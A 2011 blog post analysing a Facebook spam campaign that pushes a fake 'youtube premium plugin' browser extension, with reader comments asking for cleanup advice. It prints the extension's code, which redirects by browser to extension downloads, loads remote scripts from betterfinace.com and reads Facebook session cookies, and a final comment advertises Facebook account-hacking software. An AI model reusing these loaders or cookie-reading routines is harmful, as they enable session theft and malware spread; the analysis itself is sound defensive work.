Tuesday, December 13, 2011

"It Happens on Live television" Facebook spam demystified - A completely new form of Spam



Hello friends. I love facebook spams. The reason is that you will find the best use of javascript, flash, facebook plugins and of coarse social engineering. There is always so much to learn. The last faebook spam which we looked at here in HackingAlert was the "How can Rehanna Do this" Facebook spam.

It was a browser vulnerability which was floating around for some days. Fortunately only Crome and safari were affected by that attack and it has been fixed now. Companies try real hard to fix all holes. But ultimately the security lies in you.

The recent spam is clearly the best spam ever flooded the social platform. It has been crafted very nicely and trickly.  Lets demystify the spam and dig deeper into how the creators built this yet another headache for facebook. This time the target have been Firefox and Crome users.

As usual once you click on the malicious link, you will be asked to share it with your friends before you can watch. Here lies the first trap. Once you share it, you are pushed out of the platform to a blogspot link where you will be asked to download a plugin before you can watch the video. Even the plugin has been named as "youtube premium plugin"(Hats of to the thinker of this name :-) ). Look at the picture below. There are 3 things to notice in this.


Once you share this link on your profile, you will be redirected to a link outside the platform. Once the spammer or hacker succeeds you in dragging out of the platform, the real fun begins for him.
So the first thing to notice is the blogspot link which surely does not belong to facebook. The next thing to notice is the error message. This error message is a fake one. Infact the entire flash error generated looks like a error but it is only the use of image and text. The black background that you see is a simple html canvas. The red smily face that you see is an image and the link "install plugin" is a simple hyperlink created with html. Look at the neatness with which spammer has used simple html to look like a missing pluging error.
Now coming to the 3rd thing. Look at the image in the third part and notice the text written on its right hand side. Do you see any relation? A Girl showing somthing(which you might be dieing to see) and the text says "Premium property-B'lore. Obviously the property is premium in the image as well.
Actually the image has got nothing to do with the text. The text is a simple advertisement and the spammer has neatly added a video thumbnail so as to make it appear as the link to this video. Once you click that link, obviously you will not see that premium property which you wanted to and inturn the spammer will make pocket money through add clicks.
There is one more thing to look at. (this one is real fun!). Look at the image.

Just below the addvertisement, you will find the facebook social plugin for adding comments. Well its a fake plugin simply designed by HTML. Even the comments gives you message that in order to view this video you will have to share it first. This is Social Engineering at its best.

Now moving ahead with the spam. What happens when you click the link " install plugin" ?

The first thing that happens is a hidden javascript executes and it verifies your browser type. It checks weather you are using Crome or Firefox so that it can redirect you to respective links to download extensions.
If you are using Crome then you will be redirected to http://betterfinace.com/youtube.crx and if you are using firefox then you will be redirected to http://betterfinace.com/youtube.xpi . crx is the default extension for crome plugins and xpi for firefox.
Here is the javascript which performs this task:


var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;
var is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') > -1;
function instalar(){
if (is_chrome){
window.open("http://betterfinace.com/youtube.crx");
}
else if(is_firefox){
var params = {
"Youtube Extension": {
URL: "http://betterfinace.com/youtube.xpi",
toString: function () { return this.URL; }
}
}; 


the download for the plugin will start after finding your browser type. here I am using firefox as an example.
Firefox will prompt you for download along with a warning that it is an untrusted plugin.




But how can we let go premium youtube plugin. So we will install it. Now in order to check what this plugin is actually ment for, we will have to decode the .xpi extension. If you open the .xpi extension then you will find lots of PK and JSPK texts which means that it is simply a compressed file. So rename it to .zip or .rar and then decompress it to view the content of the file.
I found the follwing javascripts in the file.


Presence of so many javascripts is enough to identify what this plugin is all about. Basically thsese scripts contain a lot of things. This spam has been designed to attack the user in every possible way. It adds malware, steals cookies of facebook from the victim system, adds a JS trojan and what not. let us dig out each of them.
prefman.js and script-compiler.js are required scripts for building firefox plugins. the only script to look for is youtube.js. It contains the hidden secret of this plugin. Give a look at the code:


loadScript_you();
function loadScript_you() {
if ('https:' == document.location.protocol) return false;
var s = document.createElement('script');
s.setAttribute("type","text/javascript");
s.setAttribute("src", "http://betterfinace.com/script.js");
var head=document.getElementsByTagName("head")[0];
if( head==null) return false;
head.appendChild(s);
return true;
}


The first thing. If you are browing https protocol then you are safe. It wont allow the creation of the script object to copy the location. On parsing this script, the browser will look for attributes in http;//betterfinance.com/script.js. Now the question is what dows this external script do?
Lets visit the link to analyse the script deeply.


function addScript() {
 var s = document.createElement('script');
 s.setAttribute("type", "text/javascript");
 s.setAttribute("src", "http://betterfinace.com/extra.js");
 var a = document.getElementsByTagName('script')[0];
 if (a == null) return false;
 a.appendChild(s);
 return true
}
addScript();


You will notice a similar script again. Well the reason for building such links is not clear to me. Maybe there is something I am missing. So this script also contains a link to another external javascript which will be appended in the plugin when browser parses it. Let us see what is hidden in this link.
Well this is the script which holds all the secret. I am still looking at this script deeply. Some of the functions which were easy to catch were ;

function fb_comparte() : this function is responsible for generating the random fake plugin comments which we saw above.

function readCookie(a) : got damn! cookie stealer for any link you visit.

function setCookie(nombre, valor, caducidad) : randomly adds cookies to track your internet activities.



function FBFBFB321() : Facebook cookie stealer ( not again). Here is the snippet.


function FBFBFB321() {
    if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) {
        var cook = readCookie("fb_videoazs");
        if (cook == "activo") {
            return false;
        }
        var user_id = readCookie('c_user');
        if (user_id == null) return false;
        cook = readCookie("fb_videobzs_" + user_id);
        if (cook == "activo") {
            return false;
        }
        setTimeout(function () {
            fb_comparte();
        }, 2000);
        return true;
    }
    return false;
}


There are some other scripts too but I am too tired now so want to end this post.
Time and again facebook has been hit by such spams. We need to aware of what we do on facebook. Think before you click, before you share.
The spam is still active on the internet so you can go ahead and try out your own research. Facebook spams are a great tool to learn. You really get to know the tricks used by hackers and spammers to make you their pray. Hope you enjoyed my efforts. Time to watch out some premium property ;-) .
Do add your comments and suggestions.


DARKLORD!!


24 comments:

  1. nice blog nice article.. greeting from indonesia :)

    ReplyDelete
  2. @abhinav sing

    Thanks for the info !!

    I also read your paper on AV bypassing techniques Was really cool Hats off to u >>>>>>>>>

    ReplyDelete
  3. really enjoyed this post...lol
    Hats off to these spammers for their intelligence
    N hats off to u for such deep analysis, btw I have a question if I want to analyse some suspicious link like this one then how should I do? Do u use virtual machine for such purpose?

    ReplyDelete
  4. @PRAMOD : thanks pramod....spammers are indeed smart..If you wnt to analyse suspicious links then there are two ways...use a virtual machine(and a fake fb accnt as well)...the second thing you can do is to open the malicion link in another browser. Suppose you are using crome for normal activites and all of a sudden you come across a malicious link then copy the link and open it in firefox and see what is does..make sure your anti virus is working so that it can block nay suspicious activity.

    ReplyDelete
  5. i think i had shared that link on my Facebook account. please anyone help how to cure that and even i had tried to download that missing divx application..................

    ReplyDelete
  6. @sumit : disable the plugin by going to plugin settings in your browser..In case you have shared on it on your wall then nothing more can be done other than deleting it manually..Facebook will remove it automatically for you once they identify this spam(i think they must have removed it by now)..

    ReplyDelete
  7. but What about my other cookies and browser history present past on my chrome and Firefox browser this spammers can see that cookies or my important urls,, please any one answer to this question...

    ReplyDelete
  8. @sumit : once you disable the plugin it wont be able to track you any further...but if you have opened any of your personal accounts when this plugin was active then it is highly recommended that you change the password of those accounts...This plugin is browser specific..if it is installed in your crome browser then It can monitor only your crome activities..

    ReplyDelete
  9. @Abhinav : if i disable that application then later they can cant keep track on my browser or Facebook account. thanks for such information, i will share this post to all off my frnds.

    ReplyDelete
  10. Once you disable it, it wont be able to track your cookies..I have analysed the code so I am sure about it...please shre this post on your facebook and social networks to help spread awarenes.. :)

    ReplyDelete
  11. Thank You Very Much Abhinav, Nice Articles and good information, thanks 4 helping me out, please always keep update like this show people can come to know about this spam's and this hackers. anyways ABHINAV could u please let me know if some one hack's my personal account like gmail or facebook then how to find whether its hacked one and keeping track on me...

    Thank You @Abhinav....

    ReplyDelete
  12. In facebook you can go to Account settings > Security .. there you can find your recent logged in activities..If there is some activity which you believe is not yours then you can change the account passwrd and oother information...Similarly you can check for gmail as well..Login to gmail and go to the bottom of the inbox page..there you will find a link called "last account activity - Details"..Click on details to see your recent logged in activities...if you find any suspicious activities then it means someone else has logged into your account as well..It is highly recommended that you shift to 2 level security in gmail..

    ReplyDelete
  13. Gotcha thanx...i guess the reason for switching browser is to avoid cookies stealing isn't it

    ReplyDelete
  14. my frnd got deleted youtube extension from addons bt still its posting virus will it be okiii afterr restarting?

    ReplyDelete
  15. yes..it wont work once you hav removed the plugin

    ReplyDelete
  16. there is no such plug in my browser.... but i am still facing this problem....

    ReplyDelete
  17. .you must got a real facebook hacker hear

    http://hackxfbx.blogspot.in/

    OR

    do u wand a real facebook hacker pls click hear

    hack your friend fb account software free download

    ReplyDelete